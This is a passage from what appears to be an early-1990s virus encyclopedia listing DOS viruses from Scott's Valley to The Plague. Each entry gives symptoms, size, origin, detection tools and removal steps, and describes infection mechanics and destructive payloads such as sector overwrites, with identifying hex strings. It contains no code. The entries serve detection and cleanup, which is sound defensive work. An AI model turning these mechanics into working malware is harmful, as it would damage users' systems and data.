Saturday that falls on the 14TH of any month, at which time it will overwrite the first 100 logical sectors of the C: drive, B: drive, and A: drive. In effect, on drive C:, the virus destroys the hard disk boot sector, partition table, and file allocation table (FAT). Virus Name: Scott's Valley Aliases: 2131 V Status: Rare Discovered: September, 1990 Symptoms: TSR; .COM and .EXE growth Origin: Scott's Valley, California, USA Eff Length: 2,131 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or delete infected files General Comments: The Scott's Valley Virus was discovered in September, 1990 in Scott's Valley, California. This virus is a memory resident generic infector of .COM and .EXE files, and does not infect COMMAND.COM. The first time a program infected with the Scott's Valley Virus is executed, the virus installs itself memory resident as a low system memory TSR of 2,384 bytes. Interrupt 21 is hooked by the virus. After the virus is memory resident, any .COM or .EXE file executed will be infected with the virus. .COM files will increase in length by 2,131 bytes. .EXE files will increase in length between 2,131 and 2,140 bytes. Infected programs will contain the following hex string in the virus's code: 5E8BDE909081C63200B912082E. It is unknown if this virus is malicious. Virus Name: Sentinel Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM & .EXE growth; decrease in available free memory Origin: Bulgaria Eff Length: 4,625 Bytes Type Code: PRHAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Sentinel Virus was submitted in January, 1991, and is from Bulgaria. This virus is a memory resident infector of .COM and .EXE files, and will infect COMMAND.COM. Unlike most viruses, this virus was received with its original Turbo Pascal source code. It may be purely a research virus at this time. When the first program infected with Sentinel is executed, the virus will install itself memory resident at the top of system memory, but below the 640K DOS boundary. Interrupt 12's return is not moved by the virus. Interrupt 21 will be hooked by the virus in memory. COMMAND.COM, if not previously infected, will be infected by Sentinel at this time as well. After Sentinel is memory resident, it will infect .COM and .EXE programs larger than 1K as they are openned or executed. Infected programs will have a file length increase of 4,625 bytes, the virus will be located at the end of the file. This virus makes no attempt to hide the file length increase. File date and time in the disk directory is not altered by the virus. The following text strings can be found at the very end of programs infected with Sentinel: "You won't hear me, but you'll feel me.... © 1990 by Sentinel. With thanks to Borland." Sentinel does not appear to do anything besides replicate. Virus Name: SF Virus Aliases: V Status: Extinct Discovered: December, 1987 Symptoms: BSC 360k floppies, Resident TOM, formatted disks Origin: California, USA Eff Length: N/A Type Code: RtF - Resident Floppy Boot Sector Infector Detection Method: ViruScan (identifies as Alameda) Removal Instructions: MDisk, CleanUp, F-Prot, or DOS SYS command General Comments: The SF Virus is a modified version of the Alameda virus which activates when the counter in the virus has determined that it is infected 100 diskettes. The virus replicates when a CTL-ALT-DEL is performed, infecting the disk in the floppy drive. Upon activation, the diskette in the floppy drive is reformatted. The SF Virus only infects 5 1/4" 360K floppies. Also see: Alameda Virus Name: Shake Virus Aliases: V Status: Rare Discovered: May, 1990 Symptoms: .COM growth, message, change in COMMAND.COM memory allocation Origin: Bulgaria Eff Length: 476 Bytes Type Code: PRCK - Resident Parasitic .COM Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files General Comments: The Shake Virus was first isolated in Bulgaria in May, 1990 by Daniel Kalchev. It is a memory resident generic .COM infector, and will infect COMMAND.COM. The first time an infected program is executed, the Shake Virus will install itself memory resident, altering the image of COMMAND.COM in memory. The Shake Virus infects .COM files, infecting them as they are accessed. Infected files increase in size by 476 Bytes, though the size increase cannot be seen using a DIR (list directory) command if the virus is memory resident. While the virus is not destructive, it will occasionally display the message: "Shake well before use !" when an infected file is attempted to be run. When this message is displayed, the program terminates rather than executes. A second attempt to run the same program result in it running successfully. Virus Name: Slow Aliases: Slowdown V Status: Common Discovered: May, 1990 Symptoms: .COM & .EXE growth Origin: Australia Eff Length: 1,701 Bytes Type Code: PRsA - Resident Parasitic .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+ Removal Instructions: CleanUp V67+, Scan/D, Pro-Scan 2.01+ General Comments: The Slow Virus was discovered in Australia in May 1990. It is a memory resident generic file infector, infected .COM, .EXE, and overlay files. COMMAND.COM is not infected by this virus. The first time an infected file is executed on a system, the virus installs itself memory resident as a low system memory TSR, taking up 1,984 bytes of free memory. Interrupt 21 will be hooked by the virus. Later, as programs are executed, they will be infected by the Slow Virus. While the Slow Virus's viral code is actually 1,701 bytes in length, infected files will increase by more than this amount. Infected .COM files will increase in length by 1,721 bytes with the virus located at the beginning of the infected program. .EXE files will increase in length by 1,716 to 1,728 bytes with the virus located at the end of the infected program. In the process of infecting some .EXE files, the virus may hang the system, causing the user to have to reboot. The Slow Virus is based on the Jerusalem B virus. It is unknown what else the Slow virus does. Virus Name: Solano 2000 Aliases: Dyslexia 2.01 V Status: Rare Discovered: March, 1990 Symptoms: .COM growth, TSR, unusual file errors Origin: California, USA Eff Length: 2,000 Bytes Type Code: PRsC - Resident Parasitic .COM Infector Detection Method: ViruScan V60+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files General Comments: The Solano 2000 Virus was first isolated in Solano County, California in mid-March 1990 by Edward Winters. The virus may also be known by the name Dyslexia Virus V2.01, which can be produced by negating some null terminated bytes within the viral code. Using the same technique, what appears to be the creation date of the virus, 08FEB90, can be produced. The information regarding the information produced by negation of bytes was determined by Jay Parangalan of Solano County. The Solano 2000 Virus is a generic .COM file infector. The first time an infected .COM file is executed on the system, the virus installs itself memory resident, then proceeds to infect every .COM file that is executed. Infected programs can be manually identified by using a sector editor to view the file. Bytes 1168 thru 1952 will consist of '(' or 28h characters. Some programs, such as DiskCopy.COM which is included on all DOS diskettes, will not run after being infected with this virus, instead an "invalid drive specification" message will be displayed. This message is not in the viral code, but is due to an error condition being induced due to the virus's presence. The virus-induced error occurring with the DiskCopy program was how the virus was first spotted and eventually isolated. This particular virus, in its current state, does not survive a system warm reboot (CTL-ALT-DEL). When it is memory resident, it takes up 3K bytes of RAM. The Solano 2000 Virus does no apparent system damage, however it does check the video buffer occasionally, and may transpose numbers if they are found in certain locations. This effect, however, was not experienced on the author's system in researching this virus. There have also been reports that instead of transposing numeric characters, the Solano virus may change color attributes on the display screen when it is active in memory. Known variants of the Solano 2000 virus: Solano 2000-B: same as Solano 2000, except the 28h characters have been changed to DAh characters, and are located in bytes 1168 thru 1912 in infected files. Dyslexia 2.00: same as Solano 2000, except that the 28h characters are now binary zeros. The attempted transposing of numeric characters in video memory has also been slowed down. The creation date appears to be 22JAN90 instead of 08FEB90. Also see: Subliminal 1.10 Virus Name: Sorry Aliases: G-Virus V1.3 V Status: Rare Discovered: June, 1990 Symptoms: .COM growth, decrease in system and free memory Origin: Eff Length: 731 Bytes Type Code: PRNCK - Parasitic Resident .COM Infector Detection Method: ViruScan V64+, F-Prot, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or delete infected files General Comments: The Sorry Virus was isolated in June, 1990. Its name comes from a german phrase in the virus: "Tut mir Leid !". This virus is based on the Perfume Virus from West Germany, and some anti-viral programs will identify it as Perfume or 4711. The first time a program infected with the Sorry Virus is executed, the virus will install itself memory resident in high memory. Total system memory and free memory will both decrease by 1,024 bytes. Interrupt 21 will be hooked by the virus. COMMAND.COM is immediately infected by the virus, thus insuring on later system boots that the virus becomes memory resident immediately. After the virus is memory resident, it will infect any .COM file which is executed, increasing the file's length by 731 bytes. The viral code is located at the end of infected files. The Sorry Virus contains the following text strings: "G-VIRUS V1.3" "Bitte gebe den G-Virus Code ein" "Tut mir Leid !" It is unknown what the Sorry Virus does when it activates. Also see: Perfume Virus Name: Spyer Aliases: V Status: Rare Discovered: November, 1990 Symptoms: TSR; .COM & .EXE growth; system hangs Origin: Taiwan Eff Length: 1,181 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D or Delete infected files General Comments: The Spyer Virus was isolated in November, 1990 in Taiwan. This virus is a memory resident infector of .COM and .EXE files. It does not infect COMMAND.COM. The first time a program infected with the Spyer Virus is executed, the Spyer Virus will install itself memory resident as a 1,760 byte low system memory TSR. Interrupts 21 and 22 will be hooked by the virus. Once the virus is memory resident, the virus will attempt to infect the next program that is executed. If the program is already infected with the Spyer Virus, the system will become hung. If the program was not already infected, Spyer will infect it and then hang the system. Infected .COM files will always increase in length by 1,181 bytes. .EXE files infected with Spyer will have a file length increase between 1,181 and 1,195 bytes. In both cases, the virus will be located at the end of the infected file. Infected files will also always have the following hex character sequence at the end of file: "CBDFD9DE848484". The Spyer Virus, in its present form, is not expected to ever be a serious problem. Since it always hangs the system when the next program is executed after becoming memory resident, it is simply too obvious that something is wrong. Virus Name: Stone`90 Aliases: Polish 961, Stone-90 V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth Origin: Poland Eff Length: 961 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Stone`90 Virus, or Polish 961, is a non-resident direct action infector of .COM programs, including COMMAND.COM. It was submitted in December, 1990, and is from Poland. When a program infected with the Stone`90 Virus is executed, the virus will look for one .COM program on the current drive and in the current directory to infect. If one is found, the virus will infected it. The newly infected .COM program will increase in length by 961 bytes, and have the virus's code located at the end of the program. The following text strings can be found in infected files: "Sorry, I`m INFECTED!" "I`m already NOT infected!" "(C) Stone`90" Stone`90 does not appear to do anything besides replicate. Virus Name: Stoned Aliases: Donald Duck, Hawaii, Marijuana, New Zealand, Rostov, San Diego, Sex Revolution, Smithsonian, Stoned II V Status: Common Discovered: February, 1988 Symptoms: BSC, TSR, messages, RLL controller hangs Origin: New Zealand Eff Length: N/A Type Code: BRtX - Resident Boot Sector & Partition Table Infector Detection Method: ViruScan, CleanUp, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, MDisk, F-Prot, Pro-Scan 1.4+ General Comments: The Stoned virus was first reported in Wellington, New Zealand in early 1988. The original virus only infected 360KB 5 1/4" diskettes, doing no overt damage. The original diskette-only infector is extinct, however, and all known variants of this virus are capable of infecting the hard disk partition table as well as may damage directory or FAT information. Most variants of this virus have only minor modifications, usually in what the message is that the virus may display on boot. When a computer system is booted with a Stoned infected disk, this virus will install itself memory resident at the top of system memory. The interrupt 12 return will be moved, and ChkDsk will indicate that the computer system as 2K less total memory than what is installed. If the system boot was from a diskette, the virus will also attempt to infect the hard disk partition table, if it was not previously infected. During the boot process, the Stoned Virus may display a message. The message is displayed more or less on a random basis. The most common text for the message is: "Your computer is now stoned." Or: "Your PC is now Stoned!" After Stoned is memory resident, it will infect diskettes as they are accessed on the system. When Stoned infects a diskette, it moves the original boot sector (sector 0) to sector 11. The Stoned Virus then copies itself into sector 0. Since sector 11 is normally part of the diskette root directory on 360K 5.25" diskettes, any files which had their directory entries located in this sector will be lost. Some versions of DOS have sector 11 as part of the File Allocation Table, which may also result in the disk's FAT being corrupted. When Stoned infects that system hard disk, it copies the hard disk's original partition table to side 0, cyl 0, sector 7. A copy of the Stoned Virus is then placed at side 0, cyl 0, sector 1, the original location of the hard disk partition table. If the hard disk was formatted with software which starts the boot sector, file allocation table, or disk directory on side 0, cyl 0 right after the partition table, the hard disk may be corrupted as well. In order to disinfect a system infected with the Stoned Virus, the system must be powered off and booted with an uninfected, write- protected boot diskette. If this is not done, the virus may reinfect diskettes as soon as they are disinfected. There are many programs which can disinfect Stoned infected diskettes and hard disks. To successfully use one of these, follow the instructions with the program. To remove Stoned manually, the DOS SYS command can be used on 5.25" 360K diskettes. On the hard disk, the original partition table must be copied back to side 0, cyl 0, sector 1. This can be performed with Norton Utilities, or other sector editors. Known variants of the Stoned Virus are: Stoned-A : Same as Stoned above, but does not infect the system hard disk. This is the original virus and is now extinct. The text found in the boot sector of infected diskettes is: "Your computer is now stoned. Legalize Marijuana". The "Legalize Marijuana" portion of the text is not displayed. Stoned-B : Same as Stoned indicated above. Systems with RLL controllers may experience frequent system hangs. Text typically found in this variant is: "Your computer is now stoned. Legalise Marijuana". The "Legalise Marijuana" may also be in capital letters, or may be partially overwritten. It is not displayed. Stoned-C : same as Stoned, except that the message has been removed. Stoned-D : same as Stoned, with the exception that this variant can infect high density 3.5" and 5.25" diskettes. Stoned II: Based on Stoned-B, this variant has been modified to avoid detection by anti-viral utilities. Since its isolation in June, 1990, most utilities can now detect this variant. Text in the virus has been changed to: "Your PC is now Stoned! Version 2" Or: "Donald Duck is a lie." The "Version 2" portion of the text may be corrupted as well. Rostov : Similar to Stoned-B, this variant does not display any message. It contains the text: "Non-system disk" and "Replace and strike". Submitted in December, 1990, origin unknown. Sex Revolution V1.1 : Submitted in December, 1990, this variant is similar to Stoned-B. This variant may display the following message: "EXPORT OF SEX REVOLUTION ver. 1.1" Sex Revolution V2.0 : Similar to Sex Revolution V1.1, the message has been changed to: "EXPORT OF SEX REVOLUTION ver. 2.0" Stoned-E : Similar to Stoned-B, this variant now emits a "beep" thru the system speaker when the following message is displayed: "Your PC is now Stoned!" The text "LEGALISE MARIJUANA!" can also be found in the boot sector and system partition table. Stoned-F : Similar to Stoned-E, this variant also emits a "beep" thru the system speaker when its message is displayed. The displayed message is: "Twoj PC jest teraz be!" The text "LEGALISE MARIJUANA?" can also be found in the boot sector and system partition table. Virus Name: Subliminal 1.10 Aliases: V Status: Rare Discovered: May, 1990 Symptoms: .COM growth, TSR, unusual file errors, video display flicker Origin: California, USA Eff Length: 1,496 Bytes Type Code: PRsC - Resident Parasitic .COM Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+ Removal Instructions: Scan/D, Pro-Scan 1.4+, or Delete Infected Files General Comments: The Subliminal 1.10 Virus was first isolated in Solano County, California in May 1990 by Jay Parangalan. The name of the virus can be produced by negating (XORing with FF) some null terminated bytes in the viral code. Using this technique, the creation date of the virus appears to be 02OCT89. The Subliminal 1.10 Virus appears to be a very early version of the Solano 2000 Virus, and has only been reported at Solano Community College. The first time a program infected with the Subliminal 1.10 Virus is executed, the virus installs itself memory resident. Any .COM files which are then executed are infected. Infected programs will increase in length by 1,496 bytes. With the virus memory resident, the system monitor will appear to flicker. What is occurring is that the virus is attempting to flash the message "LOVE, REMEMBER?" in the lower left portion of the display for a subliminal duration. The actual amount of time the message displays on the screen varies between systems due to CPU speed. Also see: Solano 2000 Virus Name: Sunday Aliases: V Status: Common Discovered: November, 1989 Symptoms: TSR, executable file growth, messages, FAT corruption Origin: Washington (state), USA Eff Length: 1,636 Bytes Type Code: PRsAT - Parasitic Resident .COM, .EXE. & .OV? Infector Detection Method: ViruScan V49+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, Scan/D, F-Prot, Pro-Scan 1.4+, VirexPC, VirHunt 2.0+ General Comments: The Sunday virus was discovered by many users in the Seattle, Washington area in November, 1989. This virus activates on any Sunday, displaying the message: "Today is Sunday! Why do you work so hard? All work and no play make you a dull boy! Come on! Let's go out and have some fun!" The Sunday virus appears to have been derived from the Jerusalem virus, the viral code being similar in many respects. Damage to the file allocation table or FAT has been reported from a number of infected users. Known variants of the Sunday Virus are: Sunday-B : Similar to the Sunday Virus, this variant does not activate on any day of the week due to an error in the day of the week checking routine. The message in the virus is never displayed, and no damage is done to the file allocation table. Sunday-C : Similar to Sunday-B, this variant also never activates. It has, however, been modified so that it differs from both the Sunday and Sunday-B viruses. Functionally, it is the same as Sunday-B. Virus Name: Suriv 1.01 Aliases: April 1st, Israeli, Suriv01 V Status: Extinct Discovered: April, 1987 Symptoms: TSR, .COM growth, messages, system lock April 1st Origin: Israel Eff Length: 897 bytes Type Code: PRsC - Parasitic Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, VirHunt 2.0+, or UnVirus General Comments: The Suriv 1.01 virus is a memory resident .COM infector. It will activate on April 1st after memory is infected by running an infected file and then a uninfected .COM file is executed. On activation, it will display the message: "APRIL 1ST HA HA HA YOU HAVE A VIRUS". The system will then lock up, requiring it to be powered off and then back on. The text "sURIV 1.01" can be found in the viral code. Virus Name: Suriv 2.01 Aliases: April 1st-B, Israeli, Suriv02 V Status: Extinct Discovered: 1987 Symptoms: TSR, .EXE growth, messages, system lock April 1st Origin: Israel Eff Length: 1,488 bytes Type Code: PRsE - Parasitic Resident .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, VirexPC, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, UnVirus, VirHunt 2.0+ General Comments: The Suriv 2.01 virus is a memory resident .EXE infector. It will activate on April 1st after memory is infected by running an infected file, displaying the same message as Suriv 1.01 and locking up the system. The virus will cause a similar lockup, though no message, 1 hour after an infected .EXE file is executed on any day on which the system default date of 01-01-80 is used. The virus will only infect the file once. Virus Name: Suriv 3.00 Aliases: Israeli, Suriv03 V Status: Extinct Discovered: 1988 Symptoms: TSR, .COM, .EXE, & .SYS growth; Black Window; system slowdown Origin: Israel Eff Length: 1,813 (COM files) & 1,808 (EXE files) bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, Scan/D/X, F-Prot, Unvirus, VirHunt 2.0+ General Comments: May be a variant of the Jerusalem virus. The string "sUMsDos" has been changed to "sURIV 3.00". The Suriv 3.00 virus activates on Friday The 13ths when an infected program is run or if it is already present in system memory, however files are not deleted due to a bug in the viral code. Other than on Friday The 13ths, after the virus is memory resident for 30 seconds, an area of the screen is turned into a "black window" and a time wasting loop is executed with each timer interrupt. As with the Jerusalem B viruses, this virus can also infect overlay, .SYS, and other executable files besides .EXE and .COM files, though it does not infect COMMAND.COM itself. Also see: Jerusalem, Jerusalem B Virus Name: Sverdlov Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; decrease in total system and available memory Origin: USSR Eff Length: 1,962 Bytes Type Code: PRhAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected programs General Comments: The Sverdlov Virus was submitted in December, 1990. This virus is believed to have originated in the USSR. Sverdlov is a memory resident infector of .COM and .EXE files, and will infect COMMAND.COM. This virus is also encrypted. The first time a program infected with the Sverdlov Virus is executed, the virus will install itself memory resident at the top of system memory but below the DOS 640K boundary. 4,080 bytes of memory will have been reserved, and the interrupt 12 return is not altered by the virus. The DOS ChkDsk program will indicate that total system memory and available free memory is 4,080 bytes less than expected. COMMAND.COM will also be infected at this time if it was not already infected. Once Sverdlov is memory resident, any .COM or .EXE file over 2K in length will become infected if it is executed or openned for any reason. Infected .COM files have a file length increase of 1,962 bytes. Infected .EXE files will have a file length increase of 1,962 to 1,977 bytes in length. In both cases, the virus will be located at the end of infected programs. It is unknown if Sverdlov does anything besides replicate. Virus Name: SVir Aliases: V Status: Endangered Discovered: 1990 Symptoms: .EXE growth; file date/time changes; system hangs Origin: Poland Eff Length: 512 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: Removal Instructions: Delete infected programs General Comments: The SVir Virus was originally isolated in Poland early in 1990. The original virus which was isolated had a fatal flaw in its code which prevented it from executing. In August, 1990, a sample was obtained from Fridrik Skulason which now does replicate. This second sample, identified as SVir-B, is a non-resident infector of .EXE files. Each time a program infected with the SVir-B Virus is executed, the virus will infect one .EXE file. Infected files will increase in length between 516 and 526 bytes with the virus's code appended to the end of the file. If the virus could not find an .EXE file to infect, it will leave the drive "spinning" as it will be in an endless loop looking for a file to infect. Interestingly enough, this virus will only infect files located on the A: drive. Infected files will also have their date/time in the disk directory changed to the date and time when the infection occurred. SVir, at least in the two known variants, does not do anything malicious, it simply replicates. Known variants of SVir are: SVir-A : The original "virus" from Poland in early 1990 which did not replicate. SVir-B : A variant isolated in August, 1990 which has the bug in SVir-A fixed so that it will now replicate. Virus Name: Swap Aliases: Falling Letters Boot, Israeli Boot V Status: Rare Discovered: August, 1989 Symptoms: Graphic display, BSC (floppy only), TSR, bad cluster, Origin: Israel Eff Length: N/A Type Code: RsF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, VirexPC, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, F-Prot, or DOS SYS Command General Comments: The Swap Virus, or Israeli Boot Virus, was first reported in August 1989. This virus is a memory resident boot sector infector that only infects floppies. The floppy's boot sector is infected the first time it is accessed. One bad cluster will be written on track 39, sectors 6 and 7 with the head unspecified. If track 39, sectors 6 and 7, are not empty, the virus will not infect the disk. Once the virus is memory resident, it uses 2K or RAM. The actual length of the viral code is 740 bytes. The Swap virus activates after being memory resident for 10 minutes. A cascading effect of letters and characters on the system monitor is then seen, similar to the cascading effect of the Cascade and Traceback viruses. The virus was named the Swap virus because the first isolated case had the following phrase located at bytes 00B7-00E4 on track 39, sector 7: "The Swapping-Virus. (C) June, 1989 by the CIA" However, this phrase is not found on diskettes which have been freshly infected by the Swap virus. A diskette infected with the Swap virus can be easily identified by looking at the boot sector with a sector editor, such as Norton Utilities. The error messages which normally occur at the end of the boot sector will not be there, instead the start of the virus code is present. The remainder of the viral code is located on track 39, sectors 6 and 7. Virus Name: Swedish Disaster Aliases: V Status: New Discovered: January, 1991 Symptoms: BSC; Partition Table Altered; Decrease in system and available free memory Origin: Sweden Eff Length: N/A Type Code: BRhX - Resident Boot Sector & Partition Table Infector Detection Method: ViruScan V74+ Removal Instructions: MDisk/P General Comments: The Swedish Disaster was isolated in January, 1991. This virus appears to be from Sweden. It is a memory resident infector of floppy boot sectors and the hard disk partition table. When the system is booted from a diskette whose boot sector is infected with the Swedish Disaster Virus, the virus will infect the system hard disk's partition table, with the original hard disk partition table moved to side 0, cylinder 0, sector 6. The virus will also install itself memory resident at the top of system memory but below the 640K DOS boundary. Total system memory will decrease by 2,048 bytes, available free memory will be 6,944 bytes less than what is expected by the user. Interrupt 12's return will have been moved by the virus. After Swedish Disaster is memory resident, the virus will infect all non-write protected diskettes which are accessed on the system. On 360K 5.25" diskettes, the original boot sector will have been moved to sector 11, which is normally a part of the root directory. This means that if the disk originally had directory entries in that sector, they will be lost. The following text string can be found at the end of the boot sector of infected diskettes, as well as within the partition table on infected hard disks: "The Swedish Disaster" Diskettes infected with the Swedish Disaster can be disinfected by powering off the system and rebooting from a write-protected original DOS diskette. The DOS Sys command can then be used to replace the boot sector on infected diskettes. For hard disks, the MDisk/P program will remove this virus, though the above text string will remain in the partition table. Virus Name: Swiss 143 Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM growth; File date/time changes Origin: Switzerland Eff Length: 143 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Swiss 143 Virus was submitted in January, 1991, by Dany Schoch of Hagendern, Switzerland. This virus is a non-memory resident infector of .COM files, including COMMAND.COM. When a program infected with Swiss 143 is executed, the virus will infect all .COM files in the current directory. Infected programs will increase in length by 143 bytes, the virus will be located at the end of the infected program. The disk directory date and time will also be altered to the current system date and time when the programs were infected. This virus does not do anything besides replicate. Virus Name: SysLock Aliases: 3551, 3555 V Status: Endangered Discovered: November, 1988 Symptoms: .COM & .EXE growth, data file corruption Origin: Eff Length: 3,551 Bytes Type Code: PNA - Encrypting Non-Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, or F-Prot General Comments: The SysLock virus is a parasitic encrypting virus which infects both .COM and .EXE files, as well as damaging some data files on infected systems. This virus does not install itself memory resident, but instead searches through the .COM and .EXE files and subdirectories on the current disk, picking one executable file at random to infect. The infected file will have its length increased by approximately 3,551 bytes, though it may vary slightly depending on file infected. The SysLock virus will damage files by searching for the word "Microsoft" in any combination of upper and lower case characters, and when found replace the word with "MACROSOFT". If the SysLock virus finds that an environment variable "SYSLOCK" exists in the system and has been set to "@" (hex 40), the virus will not infect any programs or perform string replacements, but will instead pass control to its host immediately. Known variant(s) of SysLock are: Advent : Reported to be a Syslock variant, the sample of this virus received by the author does not replicate. All known samples of this virus available from anti-viral researchers also do not replicate. Fridrik Skulason of Iceland has indicated that this virus will only replicate it is on an infected .EXE file, and then it will only infect .COM files. This variant is thought to be extinct. Macho-A : same as the SysLock virus, except that "Microsoft" is replaced with "MACHOSOFT". Also see: Cookie Virus Name: Taiwan Aliases: Taiwan 2, Taiwan-B V Status: Endangered Discovered: January, 1990 Symptoms: .COM growth, 8th day any month corrupts BOOT, FAT, & Partition tables. Origin: Taiwan Eff Length: 743 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V56+, F-Prot, Pro-Scan 1.4+, VirexPC Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files General Comments: The Taiwan virus was first isolated in January, 1990 in Taiwan, R.O.C. This virus infects .COM files, including COMMAND.COM, and does not install itself into system memory. Each time a program infected with the Taiwan virus is executed, the virus will attempt to infect up to 3 .COM files. The current default directory is not first infected, instead the virus will start its search for candidate files in the C: drive root directory. Once an uninfected .COM file is located, the virus infects the file by copying the viral code to the first 743 bytes of the file, the original first 743 bytes of the file is relocated to the end of the .COM file. A bug exists in this virus, if the uninfected .COM file is less than 743 bytes in length, the resulting infected .COM file will always be 1,486 bytes in length. This effect is due to the virus not checking to see if it read less than 743 bytes of the original file before infecting it. The Taiwan virus is destructive. On the 8th day of any month, when an infected program is run the virus will perform an absolute disk write for 160 sectors starting at logical sector 0 on the C: and D: drives. In effect, this logical write will result in the FATs and root directory being overwritten. Known variant(s) of Taiwan include: Taiwan-B : Apparently an earlier version of the Taiwan virus, this variant will hang the system when infected files are executed, but after it has infected another file using the selection mechanism indicated for the Taiwan virus. Virus Name: Taiwan 3 Aliases: V Status: Rare Discovered: June, 1990 Symptoms: .COM & .EXE growth, decrease in available free memory, system hangs Origin: Taiwan Eff Length: 2,900 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V64+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, Scan/D, or delete infected files General Comments: The Taiwan 3 Virus was isolated in June, 1990 in Taiwan, R.O.C. It was dubbed the Taiwan 3 Virus by John McAfee because it is the third virus from Taiwan, the other two are Taiwan and Disk Killer. This virus is not related to either of these two viruses. The first time a program infected with the Taiwan 3 Virus is executed on a system, the virus will install itself memory resident in low system free memory. Available free memory will decrease by 3,152 bytes. The virus hooks interrupt 21. After becoming memory resident, Taiwan 3 will infect any program which is executed. .COM files will increase in length by 2,900 bytes, .EXE files will increase by between 2,900 and 2,908 bytes. Overlay files may also become infected as well. It is unknown what the activation criteria is for this virus, or what it does besides spreading. Also see: Fu Manchu Virus Name: Taiwan 4 Aliases: 2576 V Status: Common Discovered: October, 1990 Symptoms: TSR; .COM & .EXE file growth; system slowdown Isolated: USA and Thailand Origin: Taiwan Eff Length: 2,576 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, Pro-Scan 2.01+, or Delete infected files General Comments: The Taiwan 4, or 2576, Virus was isolated in October, 1990. While one copy of this virus was submitted by a user of Excalibur! who indicated that it had been received from a download of AutoCad from another BBS, a second copy was submitted to John McAfee from Thailand on approximately the same date. This virus appears to have originated in Taiwan, and is based on the Taiwan 3 virus. It is a memory resident infector of .COM and .EXE files, but will not infect COMMAND.COM. When a program infected with the Taiwan 4 Virus is executed, the virus will check to see if it is already memory resident. If the virus isn't already in memory, the virus will install itself memory resident as a low system memory TSR of 2,832 bytes. Interrupts 08 and 21 will be hooked by the virus. After the virus is resident, the virus will start to slow down the system gradually. After approximately 30 minutes, it will have slowed the system down by approximately 30 percent. Any .COM or .EXE file executed with Taiwan 4 active in memory will become infected. Infected programs will have their file length increased by 2,576 bytes for .COM files, and 2,576 - 2,590 bytes for .EXE files. The virus is located at the beginning of .COM files, and the end of .EXE files. The following text message can be found in all infected programs: "To Whom see this: Shit! As you can see this document, you may know what this program is. But I must tell you: DO NOT TRY to WRITE ANY ANTI-PROGRAM to THIS VIRUS. This is a test-program, the real dangerous code will implement on November. I use MASM to generate varius virus easily and you must use DEBUG against my virus hardly, this is foolish. Save your time until next month. OK? Your Sincerely, ABT Group., Oct 13th, 1989 at FCU." Another text string that can be found in all infected programs is: "ACAD.EXECOMMAND.COM". Virus Name: The Plague Aliases: V Status: New Discovered: January, 1991 Symptoms: "Program too big to fit in memory" message; Programs do not execute properly; Long disk accesses; Message and disk overwrite Origin: United States Eff Length: 590 Bytes Type Code: ONAK - Overwriting Non-Resident .COM & .EXE Infector Detection Method: Removal Instructions: Delete infected files General Comments: The Plague Virus was isolated in January, 1991 in the United States. This virus is a non-memory resident infector of .COM and .EXE files, including COMMAND.COM. When a program infected with The Plague is executed, the virus will attempt to infect up to three programs on the current drive, starting in the current directory. Infected programs can be either .COM or .EXE files, and COMMAND.COM can become infected. This virus is an overwriting virus. It replaces the first 590 bytes of the program being infected with a copy of itself. The file date and time in the disk directory are not altered. Programs infected with The Plague will not function properly. For .EXE files, the following message will usually be displayed upon program execution: "Program too big to fit in memory" This message may also occur for some .COM programs, but not usually. The Plague activates when an infected program is executed and it can not find an uninfected program to infect, though there is some randomness to whether or not the activation will actually occur. When this virus activates, the following message is displayed: "Autopsy indicates the cause of death was THE PLAGUE Dedicated to the dudes at SHHS VIVE LE 